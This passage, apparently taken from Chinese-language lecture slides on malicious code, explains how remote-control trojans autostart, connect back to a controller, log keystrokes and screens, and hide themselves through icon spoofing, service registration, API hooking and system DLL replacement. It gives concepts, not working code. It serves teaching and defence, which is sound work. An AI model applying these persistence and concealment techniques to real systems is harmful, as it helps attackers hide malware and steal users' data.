所有用戶有效的啟動文件夾不管用戶用什么身份登錄系統(tǒng)，放入該文件夾的快捷方式總是自動啟動——這是它與用戶專有的啟動文件夾的區(qū)別所在。該文件夾一般在：C:\DocumentsandSettings\AllUsers\「開始」菜單\程序\啟動\(8)利用系統(tǒng)自動運(yùn)行的程序在Windows系統(tǒng)中，有很多程序是可以自動運(yùn)行的，如：在對磁盤進(jìn)行格式化后，總是要運(yùn)行“磁盤掃描”程序（Scandisk.exe）；按下F1鍵時(shí)，系統(tǒng)將運(yùn)行Winhelp.exe或Hh.exe打開幫助文件；系統(tǒng)啟動時(shí)，將自動啟動系統(tǒng)欄程序SysTray.exe、注冊表檢查程序scanreg.exe、計(jì)劃任務(wù)程序mstask.exe、輸入法程序、電源管理程序等。這為惡意程序提供了機(jī)會，通過覆蓋相應(yīng)文件就可獲得自動啟動的機(jī)會，而不必修改系統(tǒng)任何設(shè)置。(9)替換系統(tǒng)DLL這種方法通過APIHOOK啟動，也稱為DLL陷阱技術(shù)。通過替換Windows系統(tǒng)中正常的DLL文件（動態(tài)鏈接文件），如kernel32.dll和user32.dll這些隨系統(tǒng)一起啟動的dll。啟動之后，如果是系統(tǒng)正常的調(diào)用請求，它就把請求轉(zhuǎn)到原先的DLL進(jìn)行處理，如果是約定的木馬操作，則該DLL文件就實(shí)現(xiàn)木馬服務(wù)器端功能?，F(xiàn)代操作系統(tǒng)對此已有防護(hù)，已很難實(shí)施有些木馬需要系統(tǒng)重啟后運(yùn)行或提升權(quán)限，如何做到？（10）其它遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過程:配置木馬傳播木馬啟動木馬建立連接遠(yuǎn)程控制建立連接木馬控制端木馬服務(wù)端InternetIntranet控制流木馬的常規(guī)通信方式建立連接A控制端A服務(wù)端1037762676266016(1)建立連接前(2)獲取服務(wù)端IP(3)木馬連接建立通過信息反饋或IP掃描獲得服務(wù)器IP地址木馬端口（服務(wù)端IP）（控制端IP）服務(wù)端口遠(yuǎn)程控制木馬的反彈技術(shù)控制端感染木馬的主機(jī)優(yōu)點(diǎn)：解決動態(tài)IP地址的問題；解決內(nèi)網(wǎng)地址的問題；繞過防火墻的限制；缺點(diǎn)：容易暴露控制端反彈遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過程:配置木馬傳播木馬啟動木馬建立連接遠(yuǎn)程控制遠(yuǎn)程控制技術(shù)木馬連接建立后，客戶端端口和服務(wù)器端口之間將會出現(xiàn)一條通道，客戶端程序可由這條通道與服務(wù)器上的木馬程序取得聯(lián)系，并對其進(jìn)行遠(yuǎn)程控制，主要包括：獲取目標(biāo)機(jī)器信息記錄用戶事件遠(yuǎn)程操作(1)獲取目標(biāo)機(jī)器信息木馬的一個主要功能就是竊取被控端計(jì)算機(jī)的信息，然后再把這些信息通過網(wǎng)絡(luò)連接傳送到控制端。一般來講，獲取目標(biāo)機(jī)器信息的方法就是調(diào)用相關(guān)的API，通過函數(shù)返回值，進(jìn)行分解和分析有關(guān)成分，進(jìn)而得到相關(guān)信息。(2)記錄用戶事件木馬程序?yàn)榱诉_(dá)到控制目標(biāo)主機(jī)的目的，通常想知道目標(biāo)主機(jī)用戶目前在干什么，于是記錄用戶事件成了木馬的又一主要功能。其一是記錄被控端計(jì)算機(jī)的鍵盤和鼠標(biāo)事件，形成一個文本文件，然后把該文件發(fā)送到控制端，控制端用戶通過查看文件的方式了解被控端用戶打開了哪些程序，敲了那些鍵；其二是在被控端抓取當(dāng)前屏幕，形成一個位圖文件，然后把該文件發(fā)送到控制端顯示，從而通過抓取得屏幕知道目標(biāo)用戶的操作行為。(3)遠(yuǎn)程操作遠(yuǎn)程操作重啟被控制端計(jì)算機(jī)，或者強(qiáng)制關(guān)閉遠(yuǎn)程計(jì)算機(jī)，當(dāng)被控制計(jì)算機(jī)重新啟動時(shí)，木馬程序重新獲得控制權(quán)。木馬使用者通過網(wǎng)絡(luò)控制被控端計(jì)算機(jī)的鼠標(biāo)和鍵盤，也可以通過這種方式啟動或停止被控端的應(yīng)用程序。對遠(yuǎn)程的文件進(jìn)行管理，比如共享被控端的硬盤，之后就可以進(jìn)行任意的文件操作。內(nèi)容提綱2木馬的工作原理3木馬的隱藏技術(shù)4惡意代碼概述1惡意代碼檢測與防御木馬的隱藏技術(shù)木馬的隱藏技術(shù)：啟動隱藏木馬文件/目錄隱藏進(jìn)程隱藏通信隱藏隱藏自己，使得目標(biāo)主機(jī)加載運(yùn)行木馬程序，而不被用戶發(fā)現(xiàn)前面介紹的各種木馬自動加載技術(shù)前面介紹的無文件木馬，通過其它軟件來觸發(fā)執(zhí)行誘騙用戶點(diǎn)擊運(yùn)行：如文件類型圖標(biāo)欺騙1、啟動隱藏用文檔類（doc/docx/txt/jpg等）圖標(biāo)來隱藏可執(zhí)行文件（exe）來欺騙受害者點(diǎn)擊文件類型圖標(biāo)誘騙VisualStudio2013：用C#編寫軟件時(shí)指定EXE文件的自定義圖標(biāo)文件類型圖標(biāo)誘騙Python：指定exe的自定義軟件圖標(biāo)文件類型圖標(biāo)誘騙通過某種方式使用戶無法發(fā)現(xiàn)木馬文件和目錄隱藏在其它文件中：如無文件木馬勾選文件/目錄屬性中的“隱藏”，文件瀏覽器不可見（除非開啟顯示所有文件）2、木馬文件/目標(biāo)隱藏3、進(jìn)程隱藏隱藏木馬進(jìn)程，使得任務(wù)管理器等工具不可見.偽隱藏是指程序的進(jìn)程仍然存在，只不過是讓它消失在進(jìn)程列表里。真隱藏則是讓程序徹底的消失，不以一個進(jìn)程或者服務(wù)的方式工作。3、進(jìn)程隱藏設(shè)置窗口不可見

(從任務(wù)欄中隱藏)把木馬程序注冊為服務(wù)

(從進(jìn)程列表中隱藏)欺騙查看進(jìn)程的函數(shù)

(從進(jìn)程列表中隱藏)使用可變的高端口

(端口隱藏技術(shù))使用系統(tǒng)服務(wù)端口

(端口隱藏技術(shù))替換系統(tǒng)驅(qū)動或系統(tǒng)DLL (真隱藏技術(shù))動態(tài)嵌入技術(shù)(真隱藏技術(shù))（1）設(shè)置窗口不可見這是最基本的隱藏方式。如果在Windows的任務(wù)欄里出現(xiàn)一個莫名其妙的圖標(biāo)，傻子都會明白是怎么回事。實(shí)現(xiàn)任務(wù)欄中隱藏，在編程時(shí)是很容易實(shí)現(xiàn)的。以VB為例，只要把form的Visible屬性設(shè)置為False，ShowInTaskBar設(shè)為False，程序就不會出現(xiàn)在任務(wù)欄里了。（2）把木馬程序注冊為服務(wù)進(jìn)程列表中不顯示木馬進(jìn)程:在Windows

9X/NT/2000/xp/2003下，把木馬服務(wù)端程序注冊為一個服務(wù)就可以了，這樣，程序就會從任務(wù)列表中消失了，因?yàn)橄到y(tǒng)不認(rèn)為它是一個進(jìn)程，在任務(wù)管理器中就看不到這個程序的進(jìn)程。這種方法對于WindowsNT/2000/xp/2003等操作系統(tǒng)來說，通過服務(wù)管理器，同樣會發(fā)現(xiàn)在系統(tǒng)中注冊過的服務(wù)。（3）欺騙查看進(jìn)程的函數(shù)Windows系統(tǒng)中，一般是通過API調(diào)用來查看運(yùn)行的進(jìn)程，常用的API包括PSAPI，PDH，ToolHelpAPI等。進(jìn)程查看軟件API調(diào)用結(jié)果返回替換API調(diào)用返回的數(shù)據(jù)，保護(hù)木馬進(jìn)程不被發(fā)現(xiàn)。（4）替換系統(tǒng)驅(qū)動或系統(tǒng)DLLDLL(DynamicLinkLibrary，動態(tài)鏈接庫)是Windows系統(tǒng)的一種可執(zhí)行文件。DLL文件沒有程序邏輯，是由多個功能函數(shù)構(gòu)成的，它并不能獨(dú)立運(yùn)行，需要由程序加載并調(diào)用。正因?yàn)镈LL文件不能獨(dú)立運(yùn)行，所以在進(jìn)程列表中并不會出現(xiàn)DLL。運(yùn)行DLL文件的最簡單方法是Rundll32.exe例如我們編寫了一個MyDll.dll，這個動態(tài)鏈接庫中定義了一個MyFunc的函數(shù)，可以通過命令執(zhí)行MyFunc函數(shù)的功能:Rundll32MyDll.dllMyFunc（4）替換系統(tǒng)驅(qū)動或系統(tǒng)DLL攻擊者使用自己的DLL文件替換掉Windows系統(tǒng)中正常的DLL文件。這種方法利用了Windows系統(tǒng)的驅(qū)動或DLL，既可以啟動木馬，也可以隱藏木馬。不使用進(jìn)程，屬于真隱藏技術(shù)。DLL木馬通過別的進(jìn)程來運(yùn)行它，如果這個進(jìn)程是可信進(jìn)程，就沒有人會懷疑它是木馬，那么這個DLL木馬作為可信進(jìn)程的一部分，就成為了被信賴的一部分而為所欲為（4）替換系統(tǒng)驅(qū)動或系統(tǒng)DLL這種方法與一般方法不同，它基本上擺脫了原有的木馬模式---監(jiān)聽端口，而采用替代系統(tǒng)功能的方法（改寫虛擬設(shè)備驅(qū)動程序vxd或動態(tài)鏈接庫DLL文件），木馬會將修改后的DLL替換系統(tǒng)已知的DLL，并對所有的函數(shù)調(diào)用進(jìn)行過濾。（4）替換系統(tǒng)驅(qū)動或系統(tǒng)DLL攻擊者的DLL文件一般包括有函數(shù)轉(zhuǎn)發(fā)器。在處理函數(shù)調(diào)用時(shí)，對于系統(tǒng)正常的調(diào)用請求，它就把請求直接轉(zhuǎn)發(fā)給被替換的系統(tǒng)DLL進(jìn)行處理；如果是約定的相應(yīng)操作(事先約定好的特殊情況)，則按照約定完成所請求的功能。這樣做的好處是沒有增加新的文件，不需要打開新的端口，沒有新的進(jìn)程，使用常規(guī)的方法監(jiān)測不到